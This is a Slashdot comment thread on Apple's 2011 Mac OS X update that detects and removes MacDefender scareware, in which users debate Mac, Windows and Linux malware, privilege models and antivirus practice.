Mac OS Update Detects, Kills MacDefender Scareware 277
CWmike writes "Apple released an update for Snow Leopard on Tuesday that warns users that they've downloaded fake Mac security software and scrubs already-infected machines. Chet Wisniewski, a security researcher with Sophos, confirmed that the update alerts users when they try to download any of the bogus MacDefender antivirus software. Wisniewski had not yet tested the malware cleaning functionality of the update, but was confident that it would work. 'It's reasonably trivial to remove MacDefender,' said Wisniewski. 'It's not burying itself in the system, not compared to some of some of the crap that we see on Windows.' The update, labeled 2011-003, adds a new definition to the rudimentary antivirus detection engine embedded in Mac OS X 10.6, aka Snow Leopard, and also increases the frequency with which the operating system checks for new definitions to daily."
ahhh... (Score:3)
So Mac Users should expect this? (Score:5, Insightful)
So every virus for Macs will get killed in the next update? Very nice work for Apple if it happens that way.
'It's reasonably trivial to remove MacDefender,' said Wisniewski. 'It's not burying itself in the system, not compared to some of some of the crap that we see on Windows.'
Pity it won't always be that way, survival of the fittest applies to viruses too.
Re:So Mac Users should expect this? (Score:5, Insightful)
So every virus for Macs will get killed in the next update? Very nice work for Apple if it happens that way.
Not really any different than Microsoft's monthly "Malicious Software Removal" update that's pushed for Windows.
Or for more comprehensive scanning (Score:3, Insightful)
Microsoft Security Essentials. It is not included in Windows, due to anti-trust restrictions (so that may change with Windows 8 since those restrictions are going away) but it is a free download. Updates itself automatically like all AV scanners, will also update via Windows Update if there's a problem.
Comment removed (Score:5, Interesting)
Re: (Score:2)
The first Windows bugs were pretty primitive and easy to kill too. I remember when a simple booting into safe mode and tossing the files would kill a great number of bugs.
You don't even know the difference between malware and bugs.
Re:Or for more comprehensive scanning (Score:4, Insightful)
Seriously now that there is blood in the water the sharks will come, and it will only get worse. they saw they were able to get some good numbers with MacDefender and now MacGuard, and thanks to Hackentosh they don't even need to buy an Apple to test their code on! The first Windows bugs were pretty primitive and easy to kill too. I remember when a simple booting into safe mode and tossing the files would kill a great number of bugs. Mark my words this is just the beginning, within 6 months I predict we'll be seeing our first really nasty deep buried Apple malware. Who knows, we may even see an Apple Code Red style mass infection!
Yeah, their "Pretty Good Numbers" were measured in maybe a few hundred Macs, worldwide. Yeah, that's some epidemic. And the ONLY reason it got as far as it did, was because of all the lame-ass website admins. who got infected by the fake banner ad, and then the genius move of then poisoning several Search Engines' Page Rank systems [abc3340.com], so those sites came up high in search results. So, the REAL SUCCESSFUL "attack" was on those websites. And I would bet my bottom dollar that the vast majority of infections were of gullible Windows-Switchers, who cannot fathom a computer platform that DOESN'T regularly need "Virus Scans". The veteran Mac users KNOW better! (Yes, I'm being smug).
.plist files, and since the rule is that they can be REBUILT if deleted, it's gonna be pretty damned hard for something to really scrog an OS X system. At least in a way that cannot be relatively easily "rebuilt".
Oh, and one of the reasons this will NEVER get to the level of a Windows problem is simple: Macs don't have a "Registry", in the sense that Windows does. Without that idiotic, centralized database of thousands of system and application settings, it is literally impossible to create malware that can survive simple file-replacement techniques. The problem is that there is literally NO reliable mechanism to "rebuild" a seriously damaged Registry. Microsoft can't do it, Third Parties can't do it, and users DAMN sure can't do it!
This is why SO many problems with Windows end with the tried-and-true mantra of "Wipe and Reload" (a/k/a the "back off and nuke it from orbit" method). Because, quite literally, it is often the ONLY way to be sure.
But, since Apple uses
And that tune you've been singing has been sung for over ELEVEN years now, and what? Heck, even Linux has much, much more "malware" that OS X. In fact, over 250 times as much.
Re:Or for more comprehensive scanning (Score:5, Insightful)
Complete balderdash.
You can't trust a machine that's running malware to tell the truth when it tells you that it is now clean - because for all you know, the malware has hooked into the very API routines your anti-malware product depends upon. Anyone who's spent any serious length of time trying to clean up a heavily infested Windows PC will attest to that.
There's booting from a CD - which is much more sensible but only 100% workable if you have a whacking great database of checksums for every valid executable, every DLL, everything that may contain runnable code on the planet and you can somehow use the CD to patch all known vulnerabilities on a system - including local exploits that may take advantage of something the user's already downloaded.
A heuristic algorithm is never going to be 100% reliable because you're essentially only one step away from trying to solve the halting problem - the only real difference is instead of saying "Will the computer halt?" you're saying "Will the computer do something undesirable?". The best you can hope for is to say it probably won't.
Re: (Score:3)
I'm no MS apologist ( I run slack on my laptop and Ubuntu server at work, eucalyptus cloud), but there is a whole lot of inaccuracies here. Any kernel level malware invalidates your "literally impossible" file replacement argument.
And yet, you fail to explain how. And yes, the rest of your comment firmly labels you as a Windows (or at least Windows Registry) apologist.
The original execution of the registry was poor, but the concept of a fast and reliable btree key-value store for all your program settings isn't that idiotic (think dbus, gnomeconf, etc).
ANY centralized database of critical configuration information is inherently fragile. Period. And doubly so with the Windows registry, because it is such a mess.
The modern windows registry has plenty of permissions built in the important areas, although it is admittedly a mess of disorganization still.
Permissions are only good until the filesystem is tricked into ignoring them with a privilege escalation. And since most Windows users still run as Administrator, that isn't even necessary.
There are plenty mechanisms to restore a registry; in fact it can be rebuilt in parts if need be. You can walk the structure and recreate the index. UBCD has an excellent one, for example.
That assumes you both
Re:Or for more comprehensive scanning (Score:5, Insightful)
Also, Microsoft includes an extra set of license checks with MSE - it's supposedly quite difficult to get it working on pirated copies of Windows. So it serves as an incentive for people to buy their OS (rather than pirate). Thus how MS sees it as a profit-making product.
Re: (Score:3)
It also lowers the price of the computer. That's why computers with Windows can be cheaper than computers with Linux. It could be win-win-win-win (MS, manufacturer, AV-vendor, user) situation if only those Symantec and McAfee products would actually work and work good.
Re: (Score:2)
Re: (Score:2, Insightful)
...what?
Re: (Score:3)
If I am reading what you said correctly you believe that Microsoft insists all computers sold with a Windows pre-install also come with a MacAfee pre-install?
If I parsed that correctly, you're mistaken. Microsoft insists no such thing. Where did you get that idea? Or am I misunderstanding what you're trying to say?
Re: (Score:3, Interesting)
Not really any different than Microsoft's monthly "Malicious Software Removal" update that's pushed for Windows.
Exactly. Sad to say, but exactly.
Re: (Score:2)
Its basically the same, yeah. Unless you happen to get stupid the day after the last update on Windows, you may not notice you've been infected for ~29 days, as opposed to like, ~1.
~1 is a lot better then ~29, isn't it?
Re: (Score:2)
Malware almost always comes out the day after the update, that way you have a one month window before anything is likely to be done about it.
Re: (Score:2)
It WASN'T that different, except now it is updating definitions. Before it was updated only through the Software Update system, just like the Malicious Software Removal Tool. Now it is more like Security Essentials, except without the behavioral detection.
Re:So Mac Users should expect this? (Score:5, Funny)
More reason to use winodws - you get a more sophisticated malware for your money.
Re: (Score:3)
The Mac scanner only scans for Trojans at this point (3 of them including MacDefender), not viruses. Apple has typically left virus scanning up to 3rd parties, while taking a more active role in alerting users about phishing and malware up front.
Re:So Mac Users should expect this? (Score:4, Informative)
The Mac scanner only scans for Trojans at this point (3 of them including MacDefender), not viruses. Apple has typically left virus scanning up to 3rd parties, while taking a more active role in alerting users about phishing and malware up front.
Ummm, what viruses would it be looking for? There aren't any real, in the wild Mac viruses unless you count Mac Guard, which barely qualifies and is only delivered via trojan that happens to spawn a separate app at run time.
Re:So Mac Users should expect this? (Score:5, Informative)
There have been some actual viruses in the wild for Mac, but the vulnerabilities are quickly patched, effectively preventing the viruses from spreading on any up-to-date system. http://www.scmagazineus.com/second-mac-virus-in-the-wild/article/32987/ [scmagazineus.com] [scmagazineus.com]
Despite the misleading claims in the article you cite, according to F-Secure, "Inqtana.A has not been met in the wild and has internal counter that prevents it's operation after 24. February 2006. So it is unlikely that this variant would be a threat to Mac Users." It was an academic proof of concept, not an in the wild spreading virus and I've seen no reports of it in the wild. Sadly, people writing articles parrot terms like "in the wild" "zero day" and "virus" without understanding what the terminology actually means.
Re: (Score:2, Informative)
No, that was just an example (of which 4 variants of Inqtana were found). Go farther back and you'll also find reports for Mac OS Classic (ranging anywhere from 4 to 60 some odd viruses depending on your source). Contrast that to the 100,000+ that have been found for a Windows based PC over the years and the comparison takes on new meaning but it does not mean that OS X will always be invulnerable. It is typically one of the first to fall in White Hat conventions, which of course leads to quick patches to c
Re: (Score:3)
To be fair, at most of those contests, more people are trying to win the Mac than the Windows box, thus making the amount of time to breach a largely uninteresting metric when it comes to determining how secure the OS is.
A more interesting metric is how long known security bugs go unpatched. Unfortunately, accurately obtaining such metrics without a colossal leak would be i
Re: (Score:2)
Time to breach is even less relevant because the order of people attempting is randomised...
On the other hand, if someone finds a bug in OSX there is really only one target for the exploit, whereas with windows there are many different versions which may require modified exploit code (wildly different hardware/drivers, home/pro/ultimate/etc, different language versions)... And Linux actually takes this even further.
Re:So Mac Users should expect this? (Score:5, Informative)
First off (and I only make this point because you seem to be trying to make this distinction), there are absolutely NO viruses for Mac OS X. None.
Second, there were plenty of viruses for classic Mac OS. This, however, has absolutely nothing to do with whether Mac OS X has viruses (for the rest of this post, I'm using a more broad term for virus, to include trojans and worms, and the like).
Third, there is a small handful of malware for the Mac, including (almost exclusively) trojans. No one is claiming otherwise, not even the people you are replying to.
Fourth, in White Hat conventions, *ALL* the systems fall. They tend to fall after certain restrictions have been removed. Macs often fall first (by mere seconds) because people want to win the Mac more than they want to win the PC.
Even knowing this I still don't use a virus scanner at present as I simply don't see a need. That said I am not foolish enough to believe that it will remain Virus free indefinitely.
Who is this imaginary person you think is saying that Macs will remain "virus free indefinitely"? This last line pretty much describes every single Mac user, from those that worry the Virus Armageddon is pending, and those that think they have nothing to worry about. No one claims this is a permanent state of things, just that it's how it is now, and tomorrow is another day.
Re: (Score:3)
Go farther back and you'll also find reports for Mac OS Classic
What's that got to do with the vulnerability or invulnerability of OS X? It's a completely different OS.
It is typically one of the first to fall in White Hat conventions, which of course leads to quick patches to close any vulnerabilities.
Spurious. For many reasons as pointed out under those /. stories. For example with the last one, OSX was declared as first to fall on day 1. Linux hadn't even been available for exploiting yet. It was timetabled to be available on day 2.
There only seems to have been two instances of malware that got into the wild. The one that was included in the torrented pirate copies of iWork 09. And last months "Mac D
Re: (Score:2)
There have been some actual viruses in the wild for Mac, but the vulnerabilities are quickly patched, effectively preventing the viruses from spreading on any up-to-date system.
http://www.scmagazineus.com/second-mac-virus-in-the-wild/article/32987/ [scmagazineus.com]
According to your link, the vulnerability was patched the year before the virus was unveiled by Sophos. And it wasn't "in the wild". That's a lot more than "quickly patched". That's Sophos creating an exploit based on a vulnerability they've only discovered because Apple fixed it.
Chance of you catching it: 0%, even at the time of that article. Chance of Sophos selling antivirus based on scare-mongering: only slightly higher.
Re:So Mac Users should expect this? (Score:4, Interesting)
That reminds me of people who were commenting here on slashdot about the fact that it doesn't matter that the malware installs without using root access, see, it does matter.
Re: (Score:3)
The only thing root access gives malware authors is rootkit installation and removal hardening. They can still read and write user files, which could lead to either ID theft, or ransomware by proprietary file encryption.
Re: (Score:2)
That reminds me of people who were commenting here on slashdot about the fact that it doesn't matter that the malware installs without using root access, see, it does matter.
I'm not sure you understand the people who say "root doesn't matter".
Malware doesn't have to stick around very long to be profitable, it only has to spread widely.
So while, yes, root matters for the cleanup...
No, it doesn't matter when it comes to logging your keystrokes and obtaining your credit card numbers/banking info/passwords.
Either way, you've gotten screwed and the malware distributors have made some money.
Re:So Mac Users should expect this? (Score:5, Informative)
Actually, on Mac OS X, it does matter.
Thus, to my knowledge, unless you exploit a bug in the OS, it should not be possible to sniff passwords in Mac OS X unless an app is running as root.
That's not to say that it can't steal passwords in other ways—spoofing password dialogs, stealing your Safari cookie files, reading your Safari bookmarks and pretending to be Safari while it displays your bank's website, etc.—but it should not be able to capture passwords that you enter in other applications. Thus, root matters. A lot.
Re: (Score:3)
Being that it's not installed with root permissions means it's easy to remove. When it can keep you from seeing it when you're looking for it (aka, root permissions), you're hosed. It's the difference between fully installing the system again along with all your programs and such and then restoring from backup, and just possibly restoring from backup if something gets hosed. You do back up, right?
Keyloggers need root (Score:2)
But it doesn't matter if you just want the piece of malware to do its job: e.g. key-log and scan for personal information
Scanning no, but to intercept keystrokes would require root access.
in addition to keeping a self-updater that may eventually pull an update that does allow for the use of an escalation exploit.
Pretty sure it would need root to install even as a start-up item, and it would be pretty visible if it did so.
Re: (Score:2)
Pity it won't always be that way, survival of the fittest applies to viruses too.
True. Also worth noting is that some environments are more hospitable to them than others. If OS X continues to grow in market share it becomes a more alluring target for virus creators, but if the system itself is very secure then you still won't see more than a trickle. Look at the difference between Apache on Linux and IIS on Windows for example. Relative security levels play a huge role.
Re: (Score:2)
So every virus for Macs will get killed in the next update? Very nice work for Apple if it happens that way.
'It's reasonably trivial to remove MacDefender,' said Wisniewski. 'It's not burying itself in the system, not compared to some of some of the crap that we see on Windows.'
Pity it won't always be that way, survival of the fittest applies to viruses too.
Actually, the way Mac OS X works, it's very difficult to construct a program that "buries" itself in the system. It's even somewhat more difficult to do than it is in Linux. On Mac OS X, every single program can be found by dropping to a bash shell. The places that get called on startup are few and easily managed.
That's not to say it's impossible or anything, but these sort of pithy responses that amount to "well, on Windows it does this, so it's only a matter of time until this happens on OS X, too" genera
Re: (Score:2)
...As long as you bought the very latest version of OSX. Atleast that's what TFS claims.
What are we detecting? (Score:5, Funny)
the rudimentary antivirus detection engine
Wouldn't we be better off detecting the viruses, not the antivirus?
Re:What are we detecting? (Score:4, Insightful)
The summary mentions:
the rudimentary antivirus detection engine
Wouldn't we be better off detecting the viruses, not the antivirus?
No .. its customary to look for signs of an infection even if you can't see the infection itself. So that by detecting anti-virii (and spelling nazis be damned) you prove that the system has come into contact in the past with a genuine virus. Unfortunately as time goes on you find the that more and more systems develop anti-virii until the entire population has developed them, thus leading you to posit that the original virus was very very wide spread. However by now, due to the universality of the anti-virii, all systems are now safe from the original virus. Which is all well and good until something to do with an unclean telephone occurs. Hmm does that make Apple one of the telephone santizers????
Re: (Score:2)
So you use an incorrect form and you know it and you are proud of that? I'm pretty sure that stupidity is worse than ignorance.
Re:What are we detecting? (Score:5, Insightful)
Wouldn't we be better off detecting the viruses, not the antivirus?
The distinction between those two categories grows hazier every year...
Re: (Score:2)
The distinction between those two categories grows hazier every year...
This is easy - the one that screws up all your network connections is the ... ah, hell.
Re: (Score:2)
The summary mentions:
the rudimentary antivirus detection engine
Wouldn't we be better off detecting the viruses, not the antivirus?
Well, if Norton on the Mac is anything like on Windows, removing it would probably provide a greater overall benefit than detecting and removing actual malware.
Nothing can possibly go wrong (Score:2)
'It's not burying itself in the system, not compared to some of some of the crap that we see on Windows.'
at least, we hope not (yet).
Re: (Score:2)
at least, we hope not (yet).
Wouldn't it be pretty trivial to do a byte-by-byte comparison of a machine that's infected and one that isn't?
Re: (Score:2)
That's what's known as "whistling past the graveyard."
"I've got some little cold sores, but it's nothing like herpes or anything..."
Honest question about security of unix systems (Score:2)
Re:Honest question about security of unix systems (Score:4, Interesting)
Re: (Score:3, Interesting)
Re:Honest question about security of unix systems (Score:4, Interesting)
This is possible to set up in Windows, GNU/Linux (using SELinux; you can also simplify things and run your web browser in the SELinux sandbox, which confines downloaded programs to the same sandbox, and by default deletes those programs when the sandbox is closed), FreeBSD (with TrustedBSD), TrustedSolaris (if anyone still cares about Solaris), AIX, etc...but I am not sure that this is something that is officially supported in Mac OS X. That being said, Mac OS X does have mandatory access control built into its kernel, and as far as I know that is what is used to implement "parental controls."
OS X's Mandatory Access Controls are a port of TrustedBSD. They are used to sandbox selected services in OS X to improve security, but not widely deployed yet for userspace software. You can configure them yourself using the CLI or using a third party application like "Sandbox".
Re: (Score:2)
Re: (Score:2)
A Windows system can be set up to have the same security model as a Unix system, and this has been recommended by Microsoft for years. However, so many legacy applications expect "administrator" privileges in Windows that this is not the easiest thing to do.
OS X's Mandatory Access Controls are a port of TrustedBSD. They are used to sandbox selected services in OS X to improve security, but not widely deployed yet for userspace software. You can configure them yourself using the CLI or using a third party application like "Sandbox".
MS can not be secured to the same degree -- a simple .reg file can disable UAC without warning, disable 64bit driver signing, and install a root Certificate Authority. This Java Applet exploit [securelist.com] (A variant of which I've found on US machines attacking US bank accounts) shows windows security for what it is -- an after thought, easily disabled.
Both OSX and Linux security are far superior IMO than Windows, but I do have working "root" level proof of concept exploits for all 3 -- reported, and unpatched (excep
Re: (Score:2, Troll)
As a final note, Mac OS X is routinely the first system to be defeated at pwn2own; some say this is because it is less secure, others say it is because the participants want Mac OS X systems more than Windows systems.
OSX is the first system to be defeated at pwn2own because its less secure, not because the OSX system is a more wanted prize. Charles Miller (the man who takes down OSX at pwn2own) has answered this before in a interview. [threatpost.com]
Many pundits have made a lot of the fact that the Mac was the first to be exploited in the Pwn2Own contest. Was the choice of the Mac as the first target because the hardware/operating system combo was more desirable as a prize than the commodity Windows laptops of the other competitors? Or was it just because Macintosh exploits occur with much less frequency than Windows exploits and would therefore be more newsworthy?
So until this year, applications on Apple were way easier to exploit than Windows. This is because Apple had weak ASLR and no DEP while Windows had full ASLR and DEP. This year, Snow Leopard has DEP, so its no longer trivial to exploit. In fact, I have lots of bugs in Safari that I easily could have exploited on Leopard but will be very difficult on Snow Leopard. So it used to be that that it was much worse, but now its mostly comparable (although still slightly behind)
Re: (Score:2)
Re: (Score:2)
errr...?
So until this year, applications on Apple were way easier to exploit than Windows. This is because Apple had weak ASLR and no DEP while Windows had full ASLR and DEP. This year, Snow Leopard has DEP, so its no longer trivial to exploit. In fact, I have lots of bugs in Safari that I easily could have exploited on Leopard but will be very difficult on Snow Leopard. So it used to be that that it was much worse, but now its mostly comparable (although still slightly behind)
bold mine.
Also.
Another question from the Twittersphere: What OS/browser pairing to you use? Do you do anything special (beyond default settings) to secure yourself while browsing?
You're not trying to pwn me are you??? Have you ever heard the saying about the cobbler's kids not having shoes? That's me, I'm afraid. I use Safari on OSX with no special settings. This isn't the most secure combination, by any stretch of the imagination, but I like it. It's designed by Apple engineers to be easy to use and 'just work' and it does. The risk of malware is low, and hey, I'm a security expert right :) The risk of a targeted attack is real, except I don't think I'm important enough to be targeted! So I rely on security by obscurity, I guess
That same guy also says he feels perfectly safe browsing on Safari ontop of OSX.
So?
Re: (Score:2)
Re: (Score:2)
The malware that relies on social engineering techniques (like the one mentioned in this discussion) is very hard to protect against. Basically, user with some kind of system privileges to install software is lured to download the software, attempt to install it, provide their password when asked by the OS/installer. If you have a user w
Re: (Score:2)
To this date there have not been any viruses (i.e. self propagating code that infects machines without user intervention) for Mac OS X and I'm pretty sure Linux as well.
You should at least try using a search engine before making a remark like that:
https://help.ubuntu.com/community/Linuxvirus [ubuntu.com]
I say this as someone who has used nothing except GNU/Linux for many years now: there are viruses out there that will infect a vulnerable GNU/Linux system. Do not be fooled, these things are out there. As an exercise, you can try to write a very basic virus that targets the vi text editor and inserts itself into any C program a user creates (if you want bonus points, have th
Re: (Score:2)
Re: (Score:2)
point is that people who opt to use some kind of UNIX as their primary machine are usually not technically clueless
That has not been my observation; the majority of Mac OS X users I know of do not know a lot about their computers, nor are they interested in learning. They purchased a system with Mac OS X because they heard that it was easy to use and would give them fewer headaches than a Windows system.
The second point is that most UNIX distros (including OS X) come with hundreds of tools to monitor the system, inspect binaries etc.
Tools which only the most experienced users can use to detect malware; even technically literate people may not be able to spot suspicious behavior.
Also, good chunk of software is downloaded as source and compiled and the localhost. This also gives you a chance to look at code directly.
Allow me to introduce you to my favorite programming contest:
h [xcott.com]
Re:Honest question about security of unix systems (Score:5, Insightful)
Windows was more insecure because Microsoft designed it to be be scriptable with com/dcom objects that apps can use to integrate into one another for app embedding. ActiveX are just objects that are designed from the ground up to be mix win32 applets inside IE. The whole object model is based upon using proprietary win32 code and api's so the programmers do not have to code as much. This was designed for lock in and accessibility everywhere with no security in mind.. Unfortunately, this meant I can write some VB 6 app to call win32 functions to wipe your hard drive and I can just copy the dll over as an activeX object in IE. If you have IE 5 or earlier all you would have to do is visit my webpage and it would run automatically on your computer and it would be trash. The iloveyou worm that hit it big in Outlook was a simple VBA script that copied the string and did a simply call to the user's address book. Most of the win32 api was designed for Windows95 built on Dos which had no concept of user rights. Only the security API for Windows NT had that modern concept. These api's were ported over to WindowsXP.
Buffer overflows are something else and poor memory management of Windows causes GP faults which everyone and their brother received back in the Win 9x days. Microsoft had trouble enforcing this because Dos and Windows 3.1 apps just took random memory addresses mostly and one would just take an address of something else and bluescreen and take down your system. So if you are a hacker and know when a ram address ends with a certain DLL (thanks to a debugger) you can put some code in that adress and WHAM instant execution. Windows also has no concept of data for execution vs data for storage. This is a flaw of x86 actually but you could put executable code in just a cookie or a temp file and it would not be hard to trick Windows when it is done executing a DLL to go to your program and it will totally bypass security. You can do this in Unix as well but this is very uncommon today as you need to be root and was a hack of the early 80s when coders wrote in assembly to gain performance tricks. This is frowned upon in the Unix world as there are excellent libraries that can obtain speeds close to assembly. Not to mention users do not want to log in as root. This same assembly calls stayed in Windows due to backwards compatibility as WindowsXP has the default user as an administrator. Doh
Anyway, this was why Windows was less secure and why MS wants you to switch to .NET. Less to do with marketshare but more to do with poor design decisions and the requirements to be backwards compatible. I am so sick of those saying Windows is great and it is marketshare or something else stupid.
Re: (Score:2)
ActiveX in IE 5 was a mess. Luckily it was EOL 10 years ago, try running 10 year old versions of Mac or Linux OSs and see how secure they are. Current versions of IE are better, and of course, if you don't run IE at all you're immune from ActiveX attacks as no other major browsers support it (and the other occasional vector, Outlook, is crazy paranoid these days).
The full user account ACL/permissions stuff has been in mainstream Windows since XP (again - many years ago).
Re: (Score:2)
Only the security API for Windows NT had that modern concept. These api's were ported over to WindowsXP
no NT APIs were 'ported' to XP. XP was NT (version 5.1 build 2600 to be precise)
Re: (Score:3)
Windows was more insecure because Microsoft designed it to be be scriptable with com/dcom objects that apps can use to integrate into one another for app embedding. ActiveX are just objects that are designed from the ground up to be mix win32 applets inside IE.
COM/DCOM is a binary object model for creating object oriented API. A COM API is just an API following some specific conventions. The convention describes how an "object" must point to a type which must have a jump table. Nothing is more or less secure about it.
It is correct that ActiveX is a COM model for extending the browser (and other types of applications). As such you can compare it to extension APIs such as NSAPI in other browsers. Nothing inherently more secure or insecure about that. Now, MS *also*
Re: (Score:2)
For years I have understood that Unix systems were less prone to security threats posed by malware/viruses/hackers due to the basic security model of unix. When naysayers said Mac was less prone because of marketshare, the argument against this is the large number of Linux servers which have never been successfully targeted by any major security threat. While this malware attack is a trojan (and more social engineering), are the naysayers actually correct that Mac is not been successfully attacked because of marketshare? If so, are unix systems not inherently more secure due to their design than other OSes?
Thanks!
When given equal incentives ($10k and/or a free laptop) to compromise an OS, OSX has always gone down first and most easily in the annual pwn2own contest. That's been a pretty clear indication that security by obscurity is Apple's main defense. "Unix systems" can be incredibly secure, but OSX is a rather flimsy incarnation of one.
Re: (Score:2)
Here is a very good article on security of Microsoft IIS vs. Apache on a Linux system:
http://www.theregister.co.uk/2004/10/22/security_report_windows_vs_linux/ [theregister.co.uk]
Have fun reading.
Re: (Score:2)
From that ancient (2004) article:
This reasoning backfires when one considers that Apache is by far the most popular web server software on the Internet. According to the September 2004 Netcraft web site survey, [1] 68% of web sites run the Apache web server. Only 21% of web sites run Microsoft IIS. If security problems boil down to the simple fact that malicious hackers target the largest installed base, it follows that we should see more worms, viruses, and other malware targeting Apache and the underlying operating systems for Apache than for Windows and IIS.
Ugh. Which operating system are the most compromised (2010): http://www.zone-h.org/news/id/4737 [zone-h.org]
Linux 1.126.987
Windows 2003 197.822
FreeBSD 46.992
Win 2008 15.083
F5 Big-IP* 14.000
Unknown 7.840
Win 2000 6.097
Which servers?
Apache 1.095.982
IIS/6.0 195.154
nginx 40.640
LiteSpeed 37.795
Zeus 14.111
Seems reality caught up with that conjecture.
Re: (Score:2)
There is no operating system that can protect against user stupidity.
Sadly, most users are stupid.
Correct. Though most Windows shops mitigate the stupidity by eliminating the users, and making everyone an administrator.
Re: (Score:2)
For years you have been assuming something that isn't true. The basic Unix security model is nothing special.
I agree. But people spout this all the time on Slashdot.
The two main reasons for this are the lack of homogeneity among various Unix-type operation systems and the differing average competence level of Windows vs Unix admins.
Don't forget the differing purposes. When people start talking about "all the Linux servers out there" they're usually comparing it to all the Windows clients out there. If you're comparing a client to a server, there are a whole class of attacks that won't hit the server (probably) because you aren't browsing, reading e-mail on it, etc.
That said, I've seen plenty of Unix machines get compromised in various ways, from defaced websites to guessed login
Re: (Score:2)
Chet (Score:2)
I haven't heard that name since I stopped reading "Hardy Boys" as a kid.
There really isn't a cure for this kind of thing. (Score:4, Insightful)
Userspace malware is nothing different than Purple Gorilla Bonzi-Buddy shit.
There is no OS or kernel patch that protects against stupid.
I can install the SELinux scripts, and there is nothing preventing me from utterly hosing the system as administrator or my own account with my own permissions. You would have to make a read-only system, maintained by someone not-me. This is what corporate IT does.
I see a market for itinerant bonded neighborhood sysadmins should people get over themselves and admit that joe-user can't handle his own computer at home.
--
BMO
Re: (Score:2)
There's no complete cure, no; but there's stuff that you can do to make it better. Apple updating the security mechanism to get its malware definitions on a daily basis, instead of as part of the normal Software Update cycle, is a very good move. It won't completely fix things, though, of course. You're absolutely right, you can't stop stupid.
But you can certainly make stupid _worse_: and Safari's "open safe files" feature (especially defaulting to yes), which includes dmgs (think, isos kinda for non-Mac fo
Re: (Score:2)
Userspace malware is nothing different than Purple Gorilla Bonzi-Buddy shit.
Purple Gorilla Bonzi-Buddies that quietly wait in the background downloading exploit code for the privilege escalation du jour. Once there's userspace malware, user-intervention isn't required; sometimes not even a login since it can use the system's scheduling (cron/schtasks.exe) to download when the user is logged out, and schedule a new exploit attempt immediately after download.
Re: (Score:2)
My mom refuses to ditch Windows despite nearly everyone else in my family (including grandparents) using Linux...
She's the only one that still gets malware -- the answer was simple: Windows Steady State [wikipedia.org] -- Restores the state of the machine each boot!
Only cure is to remove access (Score:2)
If Apple does get their future, where everything is part of the Apple walled garden and all apps, media, etc have to come from Apple then it would be possible to stop user infections. If the screening process was through enough, you could make sure nothing malicious ever made it through. Of course that is a big if, people could get creative to get around it. There's also the fact that many of us are not thrilled with the idea of one company being the gatekeeper of everything.
Short of that, nothing you can d
I hope Apple has learned a lesson from all of this (Score:3)
Hopefully in Lion they will, at the very least, explain to users that they should set up a non-admin account to do their everyday computing and only use the admin account when they need to do admin things.....
Re: (Score:3)
Almost completely irrelevant.
When the 'admin' user attempts to do anything requiring root privileges, the system prompts for a password. If you are running as a non-admin user, you just have to fill in a different username in the password box that pops up (that of a admin account). If you don't know the admin account password, then you are obviously not managing your computer, and if you do... Then you have to type in an entire extra word to get root privileges! Wow!
Re: (Score:2)
After playing around with Vista and it's UAE when it first launched, I was impressed by it's UI to make it seem very daunting and scary. I hoped it would train users to hit escape and find something better to do than shoot themselves in the foot.
Guess I was wrong...
Better Yet (Score:2)
That would solve a lot of problems.
Re:I hope Apple has learned a lesson from all of t (Score:5, Insightful)
Not exactly.
That user doesn't have admin privileges; that user is in effect, in the sudoers file. They can authorize admin privileged actions. The default user can't modify or tweak anything in /System. But they can be prompted to allow elevated access to allow things to write into important parts of the system.
And frankly, that SHOULD be the default. It doesn't make any sense at all to be more restrictive then that. Yes, you should not run as root, or administrator on windows, in your day to day stuff. But in your regular, day to day stuff, on your machine-- you will in the normal course of events need to authorize programs to install globally or tweak system prefs or whatever else on occasion.
No one will EVER learn the "lesson" you want them to be taught. In a secure environment, you may have your regular user, who can't even possibly access (even via sudo) admin power, and an entirely separate account you use to do the system configuration and application install tasks that need higher authority. That will NEVER happen on user-focused machines. Its a frankly absurd notion.
Yes, that means machines will always be susceptible to stupid people running crap that they don't mean to download or are tricked to downloading, and that means there is no /solution/ to the problem of malware. In truth, even with such a system, you wouldn't solve the stupid. You can't solve the stupid.
The default user that people operate on, and which programs they naturally, passively run under -- should not have admin access. Of course not. Even Microsoft gets that, though their implementation of the escalation process is less then ideal. But if you expect someone to sit down on their desktop machine and ever have more then a single account, you're -- out of touch. That account should not have direct system-level access, no: but no one but a tiny minority of power users will ever accept having to set up some entirely separate account that can escalate privileges.
Its not that people are stupid, or careless. Its that you're expectations are absurd. Security and ease-of-use are opposing concerns. Everyone with any sense knows this: in some situations the demands of security are such that we force the pain on usage, in others we try to find a balance which isn't as difficult.
There will never be a world where people will have two separate accounts on their home machine and that they need to decide to go from one account to another to make changes or operate said machine. People will simply use the tool given them, as they understand it is to be used.
Even on linux, more is rarely expected outside of highly secure environs. Sudo is the norm. Yeah, your account can't do much, but you can explicitly invoke its elevation with your own same password -- and that's fine. Home machines will never, ever, be bastions of secure practice.
Its just not worth the pain in the ass to regular people doing regular things. Is it as good as it can be, as secure as it can be? Not yet, but they are working on it. Windows has its UAV method of privilege escalation that is overly in your face so its too easy to hit 'yes' without thinking; linux has its explicit 'sudo' which is fine (and with GUI helpers in certain environments), and Mac has its own escalation prompt. Is this paradigm of the default user being a sudoer ideal? Maybe not. But its usable, and better then the situations where everything runs as root/administrator.
Usability frankly trumps security. You can not honestly expect users to give up much on their home systems, usability wise; or you're just out of touch with reality.
Re:From no malware on Mac (Score:5, Interesting)
Re: (Score:2)
No I'm not. That is not what I said at all. Did you reply to the right comment?!
Re: (Score:3)
Re: (Score:2)
Wait till it has the popularity / market share of Windows... Then we'll talk.
It's a well known fact that crackers only crack what crackers own. As a white-hat hacker/cracker I had never discovered any exploit vectors on Mac OS or iOS -- I also never owned an under-powered/over-priced piece of Apple hardware... (Yes, I just bought a machine that has higher specs than any notebook Apple sells, for less than half the price of their inferior model... Quality? Major components are the same brand Apple uses.
Re: (Score:2)
None of these are viruses.
Any douche can write a destructive trojan that will get by a scanner for a while. Seriously. Doesn't matter what platform your using.
Not a real virus. By ANY..... STRETCH......OF......THE......IMAGINATION.
I saw some real viruses under Classic MacOS in the System 6 and System 7 days. So far none for OSX.
No amount of tech can stop people from clicking on something destructive. Trojans do NOT count as viruses. No OS update or security software is going to make users smarter. So
Re:And so it begins... (Score:5, Insightful)
The slow, but inevitable slide to Mac OS X being locked down in the exact same way that iOS is.
First they block apps in the name of protecting users from themselves... Then they just slowly increase the definition of "harmful apps."
If by "first they block apps..." you mean "first they warn you that an app might be harmful, suggesting that you drag it to the trash, and providing a one-click option to do that from the warning dialog...", yeah.
Re: (Score:2)
The slow, but inevitable slide to Mac OS X being locked down in the exact same way that iOS is.
